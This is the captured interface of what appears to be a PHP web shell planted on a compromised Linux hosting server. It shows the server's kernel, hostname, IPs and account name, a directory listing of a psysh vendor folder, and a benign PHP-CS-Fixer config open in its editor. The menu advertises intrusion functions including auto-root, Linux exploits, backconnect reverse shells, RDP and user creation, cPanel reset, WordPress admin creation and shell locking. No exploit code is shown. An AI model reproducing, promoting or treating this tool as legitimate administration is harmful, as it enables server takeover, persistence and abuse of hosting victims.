Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
demo2 /
vendor /
psy /
psysh /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
.phan
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.editorconfig
188
B
-rw-r--r--
.gitignore
147
B
-rw-r--r--
.php_cs
941
B
-rw-r--r--
.styleci.yml
507
B
-rw-r--r--
.travis.yml
953
B
-rw-r--r--
LICENSE
1.06
KB
-rw-r--r--
README.md
1.9
KB
-rw-r--r--
composer.json
1.7
KB
-rw-r--r--
phpunit.xml.dist
315
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .php_cs
<?php $finder = PhpCsFixer\Finder::create() ->in(__DIR__) ->name('.php_cs') ->name('build-manual') ->name('build-phar') ->exclude('build-vendor'); $header = <<<EOF This file is part of Psy Shell. (c) 2012-2018 Justin Hileman For the full copyright and license information, please view the LICENSE file that was distributed with this source code. EOF; return PhpCsFixer\Config::create() ->setRules(array( '@Symfony' => true, 'array_syntax' => array('syntax' => 'short'), 'binary_operator_spaces' => false, 'concat_space' => array('spacing' => 'one'), 'header_comment' => array('header' => $header), 'increment_style' => array('style' => 'post'), 'method_argument_space' => array('keep_multiple_spaces_after_comma' => true), 'ordered_imports' => true, 'pre_increment' => false, 'yoda_style' => false, )) ->setFinder($finder);
Close